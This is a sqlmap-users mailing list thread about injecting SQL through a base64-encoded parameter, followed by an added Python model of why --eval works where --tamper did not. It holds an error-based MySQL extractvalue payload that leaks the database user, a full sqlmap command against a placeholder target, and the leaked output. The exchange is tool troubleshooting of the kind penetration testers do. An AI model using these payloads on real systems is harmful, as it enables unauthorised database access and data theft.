Cheers, works!

-- 
Konrads Smelkovs
Applied IT sorcery.

On 2 November 2014 17:10, Miroslav Stampar <miroslav.stam...@gmail.com> wrote:
> Then please try --eval instead of --tamper.
>
> E.g. --eval="param=param.encode('base64')"
>
> Bye
>
> On Nov 2, 2014 5:42 PM, "Konrads Smelkovs" <konr...@smelkovs.com> wrote:
>
>> Miroslav,
>>
>> I previously exploited this manually. The injection occurs in the MySQL
>> INSERT statement. If the statement is invalid, we get an error message in
>> HTML comments like so:
>>
>> <!--You have an error in your SQL syntax; check the manual that
>> corresponds to your MySQL server version for the right syntax to use near
>> ''lalalaa))) or'')' at line 1-->
>>
>> This is then exploitable using some well-documented methods, such as
>> appending a string like this:
>> ' or extractvalue(1,concat(0x7e,(SELECT user()))) or'
>>
>> which gives us a nice error:
>> <!--XPATH syntax error: '~root@localhost'-->
>>
>> Anyhow, I got halfway there with the following command:
>> sqlmap -u 'https://target/script.php?data=DATA:User=Test,CC=4512634722348842,CVV=1337' --tamper=base64encode --dbms=mysql -v 3 --proxy=http://localhost:8080
>>
>> sqlmap sends correctly encoded test vectors, but it doesn't send the
>> correct initial URL stability check vector:
>>
>> 1st request URL:
>> https://target/script.php?data=DATA:User=Test,CC=4512634722348842,CVV=1337
>> 2nd request URL:
>> https://target/script.php?data=REFUQTpVc2VyPVRlc3QsQ0M9NDUxMjYzNDcyMjM0ODg0MixDVlY9MTMzNy4uIlsnJ1suKSg%3D
>>
>> Also, none of the test vectors seem to trigger an error response.
>>
>> I tried with --risk=3, to no avail.
>>
>> version: 1.0-dev-1ef2c40
>>
>> -- 
>> Konrads Smelkovs
>> Applied IT sorcery.
>>
>> On 30 October 2014 13:12, Miroslav Stampar <miroslav.stam...@gmail.com> wrote:
>>
>>> Hi.
>>>
>>> In your case I would do this:
>>>
>>> 1) Decode the original base64 value and give it to sqlmap in decoded
>>> form (e.g. id=123 instead of the original id=313233)
>>> 2) Use --tamper=base64encode
>>>
>>> Kind regards,
>>> Miroslav Stampar
>>>
>>> On Thu, Oct 30, 2014 at 1:15 PM, Konrads Smelkovs <konr...@smelkovs.com> wrote:
>>>
>>>> Hello,
>>>>
>>>> I am writing a small modification which would allow tampering with /
>>>> decoding variables in the request.
>>>> As I understand it, the parameters are decoded/parsed into a dict
>>>> after option.py:2323 (parseTargetDirect()), but where can I access the
>>>> full, parsed dict of the GET/POST/cookie values?
>>>>
>>>> (Specifically, I have a base64-encoded string as a parameter, and to
>>>> insert the payload the parameter must be base64-decoded, injected and
>>>> then encoded back.)
>>>>
>>>> -- 
>>>> Konrads Smelkovs
>>>> Applied IT sorcery.
>>>>
>>>> ------------------------------------------------------------------------------
>>>> _______________________________________________
>>>> sqlmap-users mailing list
>>>> sqlmap-users@lists.sourceforge.net
>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>> -- 
>>> Miroslav Stampar
>>> http://about.me/stamparm
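Added example, not code from the thread or from sqlmap itself: a small Python model of why --tamper=base64encode left the first (stability-check) request unencoded while --eval encodes every request. The two parameter values are copied from the URLs posted above (the second with %3D URL-decoded to '='); the target-side decoder and the request sequence are constructed assumptions, and the function names are mine.

```python
"""Which sqlmap requests get base64-encoded under --tamper vs --eval.

Added example, not sqlmap source. The two values marked "from thread" are
copied from the URLs in the thread; everything else is a constructed model.
"""
import base64
import binascii
from typing import List, Optional

# From thread: value of ?data= in the first (unencoded) request.
ORIGINAL_VALUE = "DATA:User=Test,CC=4512634722348842,CVV=1337"
# From thread: value of ?data= in the second request, %3D decoded to '='.
ENCODED_FROM_THREAD = (
    "REFUQTpVc2VyPVRlc3QsQ0M9NDUxMjYzNDcyMjM0ODg0MixDVlY9MTMzNy4uIlsnJ1suKSg="
)
# sqlmap's heuristic syntax-check string, recovered by decoding the value above.
HEURISTIC_TAIL = '.."[\'\'[.)('
# The error-based payload Konrads used manually.
ERROR_PAYLOAD = "' or extractvalue(1,concat(0x7e,(SELECT user()))) or'"


def b64(text: str) -> str:
    """Standard base64 of a str, as base64.b64encode would produce it."""
    return base64.b64encode(text.encode()).decode()


def param_with_tamper(original: str, payload: Optional[str]) -> str:
    """Model of --tamper=base64encode (assumption, mirrors the thread).

    Tamper scripts transform injected payloads only. The stability check
    carries no payload, so that request sends the parameter exactly as typed
    on the command line; every later request encodes value + payload.
    """
    if payload is None:
        return original
    return b64(original + payload)


def param_with_eval(original: str, payload: Optional[str]) -> str:
    """Model of --eval="param=<base64 of param>" (assumption).

    --eval code runs before every request, so the parameter is encoded
    whether or not a payload has been injected.
    """
    value = original if payload is None else original + payload
    return b64(value)


def target_sees(param: str) -> Optional[str]:
    """Constructed model of the target script: strict base64-decode ?data=
    and return what reaches the INSERT statement, or None if decoding fails.
    """
    try:
        return base64.b64decode(param, validate=True).decode()
    except (binascii.Error, UnicodeDecodeError):
        return None


def scan_sequence(mode: str) -> List[Optional[str]]:
    """What the target sees for three typical requests: the stability check
    (no payload), the heuristic check, and one error-based payload."""
    build = param_with_tamper if mode == "tamper" else param_with_eval
    payloads = [None, HEURISTIC_TAIL, ERROR_PAYLOAD]
    return [target_sees(build(ORIGINAL_VALUE, p)) for p in payloads]


if __name__ == "__main__":
    for mode in ("tamper", "eval"):
        print(mode, scan_sequence(mode))
```

Under the "tamper" model the first element is None: the target cannot decode the raw value, so the baseline page differs from every tampered request and sqlmap's stability and heuristic checks have nothing consistent to compare against. Under the "eval" model all three requests decode to value + payload. One practical caveat when translating the thread's one-liner: str.encode('base64') exists only on Python 2 and appends a trailing newline, so on a Python 3 sqlmap the equivalent is base64.b64encode(param.encode()).decode().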